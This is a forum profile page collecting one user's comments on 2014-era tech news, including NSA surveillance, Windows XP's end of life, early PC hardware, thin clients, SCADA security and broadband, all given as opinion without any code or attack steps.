* Posts by Christian Berger

4850 publicly visible posts • joined 9 Mar 2007

Soon-to-be Facebook intern wins UK Cyber Security Challenge

Christian Berger

Re: Attack of the sophisticated spearfishing ransomware DDoS attack ..

a) But then they won't be able to use social media.

b) Even if they did, the license key updates would still go over USB which is a huge attack vector.

c) It is very hard to have a usable, yet properly updated Windows system without Internet access. Setting up your own "Windows Mirror" is much harder than setting up your own Debian one. (Although I'm sure Microsoft will sell you an overly expensive version if you are big enough)

Other problems include internal attackers or attacks on business partners, or just general idiocity.

The big problem is that there are people who decided to build infrastructure on the systems which are hardest to defend.

IBM PCjr STRIPPED BARE: We tear down the machine Big Blue would rather you forgot

Christian Berger

Re: Refresh on early PCs

Ahh, that's actually a side effect then which doesn't cost any additional clock cycles.

So the CRT controller "steals" memory access cycles from the main CPU. If you swap some address lines around, you can make sure it'll spread all it's data over all pages.

As far as I know an access to a bit on a page also causes that page to be refreshed.

Ohh and the missing DMA controller wasn't to much of a problem back then, as MS-Dos didn't support it very well. All system calls were blocking and there was no multitasking. So even when DMA was used, your program still had to wait for it.

Christian Berger

Refresh on early PCs

Actually those refreshes used to be done in software. You had 3 timers, one was used for sound, the other one as a "systick" (actually at around 19 Hz for the time) and the third one was set at around 100 Hz and started the refresh routine. So roughly 100 times per second your program would stop for a couple of hundred clock cycles. That's far less than one out of 4 memory cycles. Still there was software which would decrease that frequency to give you more cycles for your software at the risk of memory loss.

'Arrogant' Snowden putting lives at risk, says NSA's deputy spyboss

Christian Berger

Why do people invite the NSA to speak?

I mean it's obviously clear that everything you will get is just pure PR on the edge of lying. Plus those people already have more than enough of a platform to speak on. We don't need to help them with their PR.

This changes everything: Microsoft slips WinXP holdouts $100 to buy new Windows 8 PCs

Christian Berger

Actually it changes nothing

those $100 won't make Windows 8 magically compatible with the software running on Windows XP.

Kent Police fined £100k for leaving interview vids of informants in old cop shop

Christian Berger

It's the same as with companies

...but with companies it's the customer who pays.

It's very hard to punish organisations, and money is typically a very inefficient way of doing it.

GFI LanGuard 2014: Go on. Find my weaknesses and point them out

Christian Berger

Re: Other tools

This is a Trevor Pott article, don't expect any insights.

He probably hasn't heard of Nessus or OpenVAS, or couldn't get it to run. It's not like he knows about computers.

Shuttleworth: Firmware is the universal Trojan

Christian Berger

But then we'd need hardware standards

For example the framebuffer mode of every graphics card would need to work identically. We'd need to have just a small set of USB controllers, and all of that needs to be discoverable by the operating system. Otherwise you'd need to port your OS to every system just like you already need to do in the mobile world.

Is no browser safe? Security bods poke holes in Chrome, Safari, IE, Firefox and earn $1m

Christian Berger

Re: Run them in a chroot jail

I think last time I checked, you could simply chroot out of a chroot "jail". I don't think it ever was designed to be a security feature.

Christian Berger

Re: We need something more simple than webbrowsers

"That ain't going to happen now that world+dog expect to run javascript/HTML5/etc to display "hello world". The modern web browser is more like an OS than a text rendering application, and so much of the web now depends on that to work. Yes, I know its dumb, but no I don't see it changing."

Yes, but I'm not necessarily talking about "changing the web", but about providing a much more secure and restricted alternative. I mean we (normal people) are not using webmail since it's far to insecure, we use special protocols like IMAPS. We use ssh which even uses key pinning. Both protocols however are inconvenient for GUI tasks over high latency connections. (though there is an alternative to ssh called mosh which can do predictive echoes and stuff)

Imagine we had some trivial "GUI over IP" protocol which simply uses a GUI toolkit on one side and transmits events. It could run over a severely cut down version of Websocket, and you could even write a client for it which runs in browsers.

With a client in HTML5 you could have a migration strategy to native clients.

Christian Berger

We need something more simple than webbrowsers

Modern web browsers are extremely complex. Not only do they contain support for multiple image and video files, but also complex layout languages and plugins.

Maybe it might make sense to have a much simpler way to display web pages, combined with a simple way to do "web applications". It would need to have to be so simple you could implement it in a day.

Mozilla takes Windows 8-friendly Firefox out back ... two shots heard

Christian Berger

Re: 1000 Users!

Yes, and if you correlate that to other numbers published here

http://regmedia.co.uk/2014/03/14/statcounter_large.jpg

it means that those 1000 users are probably the roughly 7% of all desktop users running Windows 8... which means that there are about 14 thousand desktop PCs in the world.

Even when we assume only 1% of the Windows 8 users run Firefox, we still only end up at 1.4 million desktop PCs.

Windows hits the skids, Mac OS X on the rise

Christian Berger

How do they count?

If they are counting via flash of Javascript served by ad-brokers, for example, the results would be totally understandable. Most Linux users, for example, don't execute Javascript from sites they don't trust. It's a security feature.

That also would explain the discrepancy between those numbers and what we are all seeing in the real world.

'Amazon has destroyed the unicorn factory' ... How clouds are making sysadmins extinct

Christian Berger

How I learned the company I'm at was using Amazon services

The company I currently work at has an out-sourced wiki and issue tracker. Recently we have found out that it sends it's e-mail via an Amazon e-mail service.

Amazon advertises that service by claiming that those mails will not land in spam filters... which is a problem for people using servers in the Amazon IP-range as it's crowded with spammers.

Well so far so bad, the funny thing is how we found out about that. E-Mail from that issue tracker... which uses Amazon to not be considered as spam, landed in the spam folder. :)

Christian Berger

Re: I'm glad people believe sysadmin skills are becoming extinct

Seriously, compared to what most people have as sysadmins, you _are_ a genius.

Most sysadmins out there have never heard of rsync. They have never used a package manager or scripted something via ssh. Many probably wouldn't even find their way out of vim.

Those are people who live in the Microsoft bubble where people believe they don't need to be able to program, and that somehow it is normal that e-mail is something complex.

NSA's TURBINE robot can pump 'malware into MILLIONS of PCs'

Christian Berger

Re: Paid for subscriptions and text documents sent out over XMPP

"And that would impact packet sniffing how exactly ?"

XMPP supports various ways of end-to-end encryption, so that might be doable... even though I'd count XMPP as one of the more complex protocols.

Christian Berger

It's time for the next step in computer security

After FOSS which already eradicated many intentional backdoors for the people using it, we now need to add simplicity. The less code you have the less likely it is to contain a backdoor.

So we need protocols which can be implemented with as few lines as possible. And we may even need hardware separation so if one of the components gets compromised, it won't be able to compromise the others.

Christian Berger

Re: I invite the US and the other 5 eyes partners...

Well the German case is very well documented. Newspapers even printed commented disassemblies of it. (No I'm not kidding here's the PDF https://www.faz.net/dynamic/download/fas/FAS_09_10_2011_S41_S47_Staatstrojaner.pdf )

How to shop wisely for the IT department of the future

Christian Berger

"The nerds would just spend a lot of time arguing which technology is the best thing to use, whilst not finding out what the business actually requires."

How is that any worse than having a department which regularly chooses the worst solutions, while not finding out what the business actually requires, but just buying what vendors have to sell.

What you need, and this is true for just about any area, is a mixture of smart people with different backgrounds.

Unfortunately the typical quality of human resources is so low even running on a bunch of narrow minded idiots (having exactly the same perspective) still makes you competitive in the short run.

CIA hacked Senate PCs to delete torture reports. And Senator Feinstein is outraged

Christian Berger

Democratic oversight won't work...

....for organisations which can simply sabotage the democratic instances which should control them.

Large organisations tend to have one primary motivation, they want to survive. The NSA knows very well, that as soon as the public gets informed about what they do, and has the power to abandon them, they would do this nearly immediately. Therefore it needs to protect itself in order to survive.

Powerful secret services are not something which is compatible with a democracy.

British Pregnancy Advice Service fined £200k for Anon hack, data protection breaches

Christian Berger

You should put clauses into your contracts...

...which make the provider of IT services responsible for such fines. Then you'd finally get rid of all those "PHP-shops" which have never heard of prepared statements.

Who loves office space? Dell does: Virtualization to banish workstations from under desks

Christian Berger

Re: Oddly content free

Well something like MJPEG can work with less than a single frame of latency (<20ms). Even if you don't transmit areas which haven't changed, you won't get higher latency.

Of course you'd want to use specialized algorithms and maybe a slight bit of intra frame predictions, but it's a far cry from the multi-second broadcast quality. You can probably process everything you need with single frame latency.

The downside to this is of course that the encoding is not highly efficient. A 100 MBit connection will however still get you around 10 full frame updates per second (at JPEG 10:1 compression) of a 3840*1080 screen. Considering that typically only a small part of your screen changes, and your network connection is probably gigabit Ethernet (allowing theoretical 100 full frame updates), this will most likely work.

So, yes, this can work on the LAN and with more thought than I put into it for this comment, you can probably even make it run well enough to be practically indistinguishable from local usage.

Christian Berger

Re: Eggs in one basket

Well just like when your fileserver fails. :)

But seriously if you have it in-house, the chance of it failing is pretty low. And once you have an in-house failure, it's likely to be something like power which would knock out your local workstations, too.

This won't work for "the cloud" anyhow, since there you typically don't have the multi-megabit bandwidths you'd need for that.

Christian Berger

Look! It's the 1980s all over again!

Back then many universities had X-Terminals along with normal text-based ones. You could simply go to one of those terminals and log into a larger Unix computer. Alternatively you could log into the Unix workstation somewhere in your office.

Of course eventually local processing became more economical as local workstations became cheaper than X-terminals while networking didn't progress as fast as the rest of computing did.

What we have now is enough power to just do video encoding on the fly. It's trivial to do some sort of H.264 with cutback motion compensation on a graphics card... without slowing it down much for other tasks.

What could make this a booming industry would be standards. With open standards you could just access any server with any device. Just like you could use any X-terminal with just about any unixoid computer.

Linux cloud world's best kept secret DigitalOcean just bagged $37m

Christian Berger

Well it's cheap, but not mind-blowingly cheap

5 bucks for a virtual server, apparently with no Internet connectivity (the article states that they are still working on IP connectivity) has to be seen in comparison to those usual 8 Euro offers found by many companies... which include IP connectivity _and_ phone support.

Bugger the jetpack, where's my 21st-century Psion?

Christian Berger

The problem back then was mostly the software

The typical operating system MS-Dos, while still used well into the 1990s for games and business applications, just wasn't suitable for saving battery power or running on off-standard equipment. There was no reliable way to determine if a program was active or not, so some of those palmtops reduced their clock frequency after every keypress.

Dedicated operating systems had their own limitations, with limited software available and often not even real file systems. Syncing them often meant manipulating badly documented RAM objects directly.

Windows CE wasn't much better, and I remember people having swapped the original Windows CE for DOS and Windows 3.11 on early x86 compatible palmtops.

Back then constant network connectivity also was near unimaginable. Otherwise you could have simply used those devices as terminals.

Today we would almost have the hardware, what's missing now is proper monochrome or transflective displays and of course keyboards. As for the software, just having something PC like would be great. Today that platform is somewhat more flexible than it used to be. That way you could install any OS you'd like.

Dell charges £16 TO INSTALL FIREFOX on PCs – Mozilla is miffed

Christian Berger

What I'd like to have...

...would be a computer with an empty harddisk. As long as consumer PC manufacturers don't do that, I won't buy from them.

Hey, IT department! Sick of vendor shaftings? Why not DO IT, yourself

Christian Berger

Re: Missing the competative advantage

Actually it doesn't need to be expensive. Treat your IT dev team the right way. Give them decent amounts of money (actually give them what those bad IT guys get), but give them freedom.

Free them from clerical work. Get them an assistant who takes care about company bureaucracy. Give them a small "experimental" budget on which they can try out new technologies.

Then also identify the normal staff members who can program. Include them in technical decisions about your IT. Maybe they can act as a sort of interpreter between the needs of the department and the capabilities of IT.

Christian Berger

It's actually what many businesses do when they switch to Linux

Such switches usually aren't "out with the Windows box, in with the Linux one", but also switches from foreign IT products to self made ones.

One of the problems with doing things that way is that you need people who look at a problem and see the core of it. There's plenty of software developers who, when given a simple task will add layer upon layer of complexity.

There seems to be a correlation between such skills and people who prefer something unixoid as their operating system. One of the basics of the Unix philosophy is, in fact, the "Rule of Optimization" which states that you should build a prototype first.

http://catb.org/esr/writings/taoup/html/ch01s06.html#rule_of_optimization

In fact you typical unixoid environment comes with lots of useful tools for prototyping. Everything you can do on a tabulator can be done trivially with standard console tools in the time it takes to install even the simplest SQL server. It probably will be slow and buggy, but it's a prototype.

Ethernet boffins get ready to kick off 400G development

Christian Berger

Re: Well, then!

Well yes, but we already have that problem on the Internet right now. You have 100ms latency for intercontinental links and 100 MBit connections (in cheap data-centres or with end users in developed countries like Turkey). So you easily have a megabyte in transit.

Obviously there is a reason for Gigabit Ethernet for consumers. It allows much faster file transfers. Realistically you can pipe 50 Megabytes per second even with consumer equipment. It's relevant if copying your file takes 1 or 5 hours.

Microsoft to get in XP users' faces with one last warning

Christian Berger

They surely will bring out XP 2.0, won't they?

I mean not bringing out a sensible upgrade option which runs on the same hardware, supporting the same software, that would be like betraying their customers. Microsoft is such a big and trusted partner, they would never do that, would they?

Microsoft doesn't care about "Gold Partners" or anything. Those are just marketing terms. All they want is you to give them money. I know that may sound harsh to you, but Microsoft is a commercial company, they need to make money, that's their priority.

If you don't like that game, stop playing it. Don't switch from XP to Windows 8.1, but look into getting replacements for your legacy applications. For those you cannot find replacements for, get an Application server, Wine or a virtualized XP machine with tightly controlled IO.

Get Quake III running on Raspberry Pi using Broadcom's open-source GPU drivers, earn $10K

Christian Berger

Actually using it for graphics is one of the more boring things

Sure you this will enable you to connect LCDs to it since you can finally change the code to support the one you have and all that. That is already a huge stuff forward.

However for me the more exiting is that this unleashes the GPUs for general purpose computing. This will allow you to do fairly complex SDRs on that hardware.

Who earns '$7k a month' but can't even legally drink? A tech intern!

Christian Berger

I think it's a good sign that Palantir has to pay that much

It gives me hope that the young and talented still have values and won't just take any job without thinking. It's not easy refusing a $7000/month job when your likely alternative is unemployment.

It think it's great that most of the young people don't want to start at such a company which produces software to justify targeted killings of most likely innocent people. It's a sign that people don't want that. It's a sign that the public is different to those unwashed hordes gathering at NSA sponsored conferences.

Energy firms' security so POOR, insurers REFUSE to take their cash

Christian Berger

Re: Surprise!...People need to give themselves a shake and stop using MS products!

"Unless the SCADA system itself is using Windows as the operating system, or uses Windows to effect day to day control, then you are way off base."

Actually that is the case in most cases today. SCADA uses standards like OPC (OLE for Process Control) which are based on legacy Windows technologies.

Those old legacy systems are probably much less of a problem since they were simple. Unless you are a total idiot and connect your internal bus to the Internet you are not likely to have any problems.

The newer stuff is much more of a problem, since it's not just Windows based, but done by that breed of 1990s Windows programmers we thought had died out with the .com crash. The people who think their C++ compiler does bounds checking, who believe in security through obscurity, who think SQL databases are a great way to store settings for desktop software and who believe in software licensing files which need to be regularly updated. (even though you already bought the hardware which is essential for the software and cost millions)

New radio tech could HALVE mobe operators' bandwidth needs

Christian Berger

Re: So let me ask this then....

Well you can use directional couplers, plus you can actually build one "into your antenna", by making an antenna with the right geometry. Both technologies can bring you about 40dB of separation tops. Maybe you can get into the range where local reflections get relevant.

But it's not going to be much of a revolution.

Boeing going ... GONE: Black phone will SELF-DESTRUCT in 30 secs

Christian Berger

Re: What would you do with a Boeing Black on your lab bench?

The key exchange for ports sounds like a good idea at first, but then we are talking about USB. Long before you can exchange any keys you'll have the USB stack talking to it. If you are lucky, you are using Linux or some BSD, then the amount of security critical bugs is probably low. If you are unlucky they are using some commercial RTOS which nobody ever checked for security issues.

IBM stuffs 64Gbps of traffic down 'low quality' fibres

Christian Berger

Yes, but the optics for multimode fibre can be a lot cheaper. Since the core is larger it's easier to splice it and get light in or out. The extreme case are plastic fibres like the ones used for SPDIF. Those are dirt cheap, that's why they are going to be used in the car industry.

Facebook pays $19bn for WhatsApp. Yep. $45 for YOUR phone book

Christian Berger

It does make sense from multiple aspects

First of all Facebook sees a competitor in WhatsApp. And a simple way to deal with it is to buy it, particularly if you have lots of (virtual) money.

Second it makes sense for the bank selling it, since it means they can turn some of the valuation into actual money without the market collapsing. Think about it, if you have 10% of bubble2-0.com and you want to sell your share on the stock market, the market will collapse and you'll end up with a small fraction of what it's worth. If you can sell it to another .com company, you will get part of your shares in actual money. So you can turn "worthless paper" into other "worthless paper", plus actual money.

Snowden journo boyf grill under anti-terror law was legal, says UK court

Christian Berger

"I think they need to bring in severe penalties for misuse of powers, any by tougher penalties I mean real punishments like lashes, the stocks.."

The point is, as long as the laws are so deliberately vague, not limiting themselves to certain crimes and not defining "Terrorism". You first have to define "propper" use of a law before you can punish "misuse". And that is one of the problems here.

It would be best to get rid of those vague "anti-terrorism" laws. There is virtually no terrorism in western countries, only abuse of those laws.

Angela Merkel: Let US spies keep their internet. The EU will build its own

Christian Berger

Well the problem is Deutsche Telekom here

Most ISPs in Germany peer with each other, so e-mail hardly ever leaves the country....

However Deutsche Telekom rarely peers, which means that packets from one German ISP to Deutsche Telekom can well go through other countries or at least foreign providers.

Obviously this is just some ploy to shift more money to that company. It'll do absolutely nothing against foreign or domestic secret services.

New password system lets planet Earth do the hard work

Christian Berger

How much enthropy is there?

I mean you somehow need to get information from the user to the system. It's easy to calculate how much information you can type, it's harder to estimate how many bits you can extract out of that kind of scheme.

Google promises 10Gps fiber network to blast 4K into living rooms

Christian Berger

Re: What's the point?

Well what's relevant today is the uplink speed. And that's the current bottleneck. And there the difference between 1 and 20 MBit is still huge. With 1 MBit you can barely stream SD, with 20 MBit you can stream decent HDTV. Particularly with fast mobile networks getting affordable, having access to your local media is a big deal.

There is a second point. We now still have companies like Google who have the money to invest in the research needed for the next decades. Who knows how long we can still do that kind of research.

We also need to invest in the infrastructure. Our current last mile is still based on copper, a technology which became outdated in the mid 1970s. We desperately need to start a programe replacing it with a dedicated pair of fibres into every home.

Your personal data is worth a measly eight bucks a month

Christian Berger

Re: At least this is honest.

I don't think you understand the idea of copyright. Copyright, in it's current form, wasn't made for "people" it was made for corporations. If personal data gets covered by it, it'll be exclusively for corporations.

Christian Berger

Around 14 years ago....

...lots of companies popped up with similar business models. They took over your computer and displayed adds when you were online. You got extra money for clicking on those ads.

Obviously people just installed it on some old box they had lying around and installed software to surf the web and click for them. So what will happen here is that most of the users will be bots.

Plan 9 moves out from Lucent licence space

Christian Berger

Actually there is a port to the Raspberry PI

Google's SECRET contracts: Android lock-in REVEALED!

Christian Berger

Considering Google Play is among the worst things of Android

I don' see how this is a limitation. My Android phone doesn't have Google Play and I've yet to miss it.

SCRAP the TELLY TAX? Ancient BBC Time Lords mull Beeb's future

Christian Berger

Please stop for a moment and look around

The UK is one of the few places on earth where television actually works. Even ITV has some fairly decent programming since there is the BBC trying to make good television without any fear of loosing their income. In Germany for example, public TV stopped caring about quality and commercial stations noticed they neither needed to care.

The UK system works. Sure it has flaws and isn't perfect, but it's better then what the rest of the world has. Please, I beg you, don't throw away what you've got.

¡Viva la Revolution! Geeksphone's new mobe to go on sale this month

Christian Berger

Re: I see problems for operators

People are already messing around with the air interface, you can buy 15 Euro feature phones you can reflash and use as GSM probing devices. The operators don't seem to mind yet.

There are, currently, no holes which would allow you to make free phone calls. What you can do is denial of service, but that's no big deal on a wireless network.

Intel Labs 'geeks' flash Edison kit to El Reg: We do it for the BIRDS

Christian Berger

Re: The paper notebook computer sounds intriguing.

The genius of the SD-Card form factor is that you can both use a plug or solder it directly onto the board.

So cool it 2.4 gigahertz: BATTERY-FREE comms for international band

Christian Berger

Well they got a patent and licenses to sell

The technology itself isn't particularly new or innovative. People have been building "signal powered" transmitters for decades now.

http://www.neazoi.com/technology/voicepassivedsb/MJRainey%20-%20El%20Silbo.htm

http://makezine.com/2009/11/03/build-a-voice-powered-rf-transmitte/

etc.